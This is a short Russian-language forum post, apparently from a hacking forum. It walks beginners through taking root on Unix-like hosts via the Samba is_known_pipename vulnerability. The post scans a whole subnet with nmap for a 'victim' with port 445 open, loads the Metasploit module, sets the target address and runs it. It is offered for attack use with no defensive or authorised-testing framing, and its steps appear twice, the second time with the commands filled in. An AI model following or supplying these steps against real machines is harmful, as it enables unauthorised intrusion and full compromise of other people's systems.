Тема по получению прав рута через уязвимость SMB на Unix-подобной машине уже была, но уважаемый Vander как-то не до конца раскрыл тему, поэтому она трудна для новичков.
Распишу поподробней:
Запускаем nmap для поиска уязвимой цели:
Найдя подходящую цель, запускаем Metasploit и используем эксплоит is_known_pipename.rb
Устанавливаем адрес потенциальной жертвы
> set RHOST Х.Х.Х.Х
Смотрим настройки
>show option
Если все правильно, запускаем сплоит:
> run
Наслаждаемся победой:
Распишу поподробней:
Запускаем nmap для поиска уязвимой цели:
nmap -sC -sS -sV -p 445 -O --open х.х.х.0/24
Найдя подходящую цель, запускаем Metasploit и используем эксплоит is_known_pipename.rb
> use exploit/linux/samba/is_known_pipename
> exploit(is_known_pipename) >
> exploit(is_known_pipename) >
> set RHOST Х.Х.Х.Х
Смотрим настройки
>show option
Если все правильно, запускаем сплоит:
> run
Наслаждаемся победой:
